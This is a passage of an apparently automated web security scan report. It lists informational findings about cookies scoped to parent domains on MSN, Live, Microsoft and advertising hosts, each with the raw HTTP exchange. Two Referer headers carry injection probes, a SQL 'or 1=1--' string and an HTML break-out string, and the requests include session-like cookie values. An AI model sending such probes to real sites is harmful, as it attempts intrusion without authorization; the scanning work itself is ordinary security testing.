GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 02:16:21 GMT
Last-Modified: Mon, 31 Jan 2011 02:16:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www391
Content-Length: 0
Content-Type: text/plain
Connection: close


16.152. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.112.2o7.net
Path:   /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 0
Content-Type: text/plain
Connection: close


16.153. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:14:43 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:13:43 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Content-Length: 11551

<!-- ServerInfo: TK2IDSMLGN1C04 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

16.154. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnportal.112.2o7.net
Path:   /b/ss/msnportalhome/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalhome/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:50:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Fri, 28 Jan 2011 23:50:09 GMT
Last-Modified: Sun, 30 Jan 2011 23:50:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain
Connection: close


16.155. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnportal.112.2o7.net
Path:   /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|2693B20C05013B68-4000010D20126E16|dinydefxxelh|2696E365851591F8-40000180E0024F83[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 02:16:45 GMT
Last-Modified: Mon, 31 Jan 2011 02:16:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www52
Content-Length: 0
Content-Type: text/plain
Connection: close


16.156. http://music.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.redacted
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: music.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 96630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Music:
...[SNIP]...

16.157. http://my.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.live.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: my.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: WEBA01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://my.redacted
Set-Cookie: mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=my.live.com; path=/
Set-Cookie: lastMarket=en-us; domain=.live.com; path=/
Set-Cookie: lastMktPath=en/us; domain=.live.com; path=/
Set-Cookie: frm=true; domain=.live.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.redacted">here</a>.</h2>
</body></html>

16.158. http://my.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.redacted
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:50:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2f&lc=1033&id=254014
Set-Cookie: MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 287

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345018&amp;rver=5.5.4177.0&amp;wp=mbi&amp;wrep
...[SNIP]...

16.159. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc03049.popsci.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1
Host: oasc03049.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13662
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="htt
...[SNIP]...

16.160. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.scientificamerican.com
Path:   /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1
Host: oascentral.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:14:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7042
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oasc
...[SNIP]...

16.161. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808490.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:25 GMT
Content-Length: 34741


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.162. http://onlinehelp.microsoft.com/en-us/msn/money.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/money.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/money.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:23 GMT
Content-Length: 26482


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.163. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/qwlinfo.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlinfo.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:27 GMT
Content-Length: 28036


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.164. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/qwlnotyours.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlnotyours.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:26 GMT
Content-Length: 24860


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.165. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/thebasics.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/thebasics.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:26 GMT
Content-Length: 21044


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.166. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7665/13236/25159-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7665/13236/25159-2.js?cb=0.7269156167749316 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ruid=154d290e46adc1d6f373dd09^6^1296308324^2915161843; ses2=7531^1; csi2=328960.js^1^1296308415^1296308415&3174527.js^6^1296226121^1296232923&3138805.js^3^1296224077^1296232921&3178295.js^1^1296226112^1296226112; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; expires=Sat, 30-Apr-2011 01:29:43 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7665/13236; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
